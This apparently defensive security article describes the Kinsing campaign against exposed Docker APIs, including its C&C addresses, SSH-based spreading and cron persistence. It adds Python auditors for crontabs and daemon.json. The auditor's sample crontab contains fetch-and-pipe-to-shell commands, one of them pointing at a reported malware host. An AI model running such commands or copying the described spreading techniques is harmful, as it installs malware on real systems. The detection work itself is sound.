A campaign that targets misconfigured Docker Daemon API ports through Kinsing malware was reported by security researchers from Aqua Security. The campaign exploited the ports to run an Ubuntu container.
According to the researchers, Kinsing malware’s strings revealed that it is a Golang-based Linux agent. The researchers ran the malware to examine its behavior and found that before deploying its payload, the malware initiated communication with the following IP addresses:
45.10.88[.]102 – Server did not respond.
91.215.169[.]111 – Connection established. Most likely the main C&C server. The malware sent small encrypted messages on regular intervals with this host.
217.12.221[.]244/spre.sh - Connection established. Used to download the shell script spre.sh
193.33.87[.]219 - Connection established. Used to download the cryptomining malware kdevtmpfsi.
The downloaded spre.sh shell script was used for lateral movement across the container network in a bid to spread the malware. The shell script passively gathered data from /.ssh/config, .bash_history, /.ssh/known_hosts, and other similar locations. It then attempted to establish a connection to each host by trying user and key combinations over SSH. If a connection succeeded, the same shell script was downloaded onto that host and used to run the malware there, spreading it to other hosts or containers in the network. After the spre.sh attack, the malware ran the kdevtmpfsi cryptominer.
For evasion and persistence, the malware utilized the shell script d.sh that did the following:
Disabled security measures and cleared logs
Downloaded and ran the shell script every minute using crontab
Halted and deleted files related to numerous applications like other malware and cryptominers
Installed and ran the Kinsing malware
Killed other malicious Docker containers and deleted their image
Looked for other running commands and cron; if found, deleted all cron jobs, including its own.
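The d.sh behaviours listed above (a cron entry that re-downloads and runs a script every minute, plus the kinsing and kdevtmpfsi artifacts) are the kind of thing a host audit can flag. The following Python script is an added example, not code from Aqua Security's report or from Trend Micro: it scans crontab lines for every-minute schedules, download-and-pipe-to-shell patterns, and references to the hosts and file names reported above, and checks a process list for the reported binary names. The crontab and process list are constructed sample data (203.0.113.10 is a documentation address used as a placeholder for the script host, which the report does not give), and the function names are this example's own.

```python
import re

# Indicators taken from the campaign description above (file names and C&C hosts
# reported by Aqua Security). Everything else in this file is constructed.
KNOWN_ARTIFACT_NAMES = ("kinsing", "kdevtmpfsi", "spre.sh", "d.sh")
KNOWN_C2_HOSTS = ("45.10.88.102", "91.215.169.111", "217.12.221.244", "193.33.87.219")

# A download utility followed, later on the same line, by a pipe into sh/bash
DOWNLOAD_AND_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Five bare asterisks at the start of the line: runs every minute
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")

# Constructed sample crontab (not a real capture); 203.0.113.10 is a placeholder host
SAMPLE_CRONTAB = """# constructed sample crontab
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -q -O - http://203.0.113.10/d.sh | sh > /dev/null 2>&1
0 * * * * curl -s http://217.12.221.244/spre.sh | bash
*/5 * * * * /usr/local/bin/backup.sh
"""

# Constructed sample process names, as a ps listing would show them
SAMPLE_PROCESSES = ["systemd", "sshd", "kdevtmpfsi", "bash", "kinsing", "dockerd"]


def _path_tokens(line):
    """Split a line on whitespace and '/' so URL and path basenames become tokens."""
    return [t for t in re.split(r"[\s/]+", line) if t]


def audit_crontab(lines):
    """Return (line_no, line, reasons) for every crontab entry that looks suspicious."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if EVERY_MINUTE.match(line):
            reasons.append("runs every minute")
        if DOWNLOAD_AND_EXEC.search(line):
            reasons.append("downloads and pipes into a shell")
        if any(host in line for host in KNOWN_C2_HOSTS):
            reasons.append("references a reported Kinsing host")
        if any(tok in KNOWN_ARTIFACT_NAMES for tok in _path_tokens(line)):
            reasons.append("references a reported Kinsing artifact")
        if reasons:
            findings.append((n, line, reasons))
    return findings


def audit_processes(proc_names):
    """Return the sorted set of process names matching the reported binaries."""
    return sorted({p for p in proc_names if p in KNOWN_ARTIFACT_NAMES})


if __name__ == "__main__":
    for line_no, line, reasons in audit_crontab(SAMPLE_CRONTAB.splitlines()):
        print("crontab line %d: %s" % (line_no, "; ".join(reasons)))
        print("    " + line)
    for name in audit_processes(SAMPLE_PROCESSES):
        print("process name matches reported artifact: " + name)
```

On a real host the same functions can be fed the output of `crontab -l` for each user, the files under /etc/cron.d, and `ps -eo comm`; a single matching reason is a prompt to look, while the every-minute plus download-and-execute combination is the persistence pattern the report describes.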
Protecting containers against threats
Incessant and ever-increasing organizational requirements have led more enterprises to leverage containers that can keep up with the scale of the demand. As more companies utilize containers, more cybercriminals are also finding them an attractive and possibly lucrative target. According to the findings of Trend Micro researchers, misconfigured containers have long been on the receiving end of cryptocurrency miners and botnet attacks, and may allow cybercriminals to gain a backdoor into an organization’s system. To protect containers against such threats, enterprises are advised to perform the following:
Secure the container host. Host containers in a container-focused OS to reduce the overall attack surface, and use tools to monitor the host’s health.
Secure the networking environment. Filter and monitor internal and external traffic by taking advantage of controls like an intrusion prevention system (IPS) and web filtering.
Secure the management stack. The container registry should be secured and monitored, and the Kubernetes installation locked down.
Secure the build pipeline. Install strong endpoint controls and implement an access control scheme.
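The entry point of this campaign was a Docker daemon API port exposed without authentication, which belongs under securing the container host. As an added example (not Trend Micro's or Docker's code), the Python below audits a daemon.json for that misconfiguration: a `tcp://` entry in `hosts` without `tlsverify`, a listener bound to all interfaces, or TLS enabled without the CA, certificate and key paths. The weak and hardened configurations are constructed samples (10.0.0.5 is an assumed management address); the `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` keys are real Docker daemon options, while the function name is this example's own.

```python
import json

# Constructed sample: the kind of daemon.json that exposes the API unauthenticated
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Constructed sample: TLS client verification on, bound to an assumed management address
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""


def audit_daemon_config(text):
    """Return a list of findings for a daemon.json document; empty means no issue found."""
    cfg = json.loads(text)
    issues = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]

    # Any TCP listener without client certificate verification is an open remote API
    if tcp_hosts and not cfg.get("tlsverify", False):
        issues.append("TCP listener(s) %s without tlsverify: unauthenticated remote API"
                      % ", ".join(tcp_hosts))

    # Even with TLS, listening on every interface widens exposure needlessly
    for host in tcp_hosts:
        if "0.0.0.0" in host or "[::]" in host:
            issues.append("%s binds all interfaces; restrict to a management address or firewall it"
                          % host)

    # tlsverify is only meaningful with a CA to verify against and a server cert/key
    if cfg.get("tlsverify") and not all(k in cfg for k in ("tlscacert", "tlscert", "tlskey")):
        issues.append("tlsverify set but tlscacert/tlscert/tlskey are incomplete")

    return issues


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        found = audit_daemon_config(doc)
        print("%s config: %s" % (label, "no issues" if not found else ""))
        for issue in found:
            print("  - " + issue)
```

The check reads the file only; it does not confirm what dockerd is actually listening on, since the daemon can also be configured through command-line flags in its service unit, so pair it with a look at the listening sockets on the host.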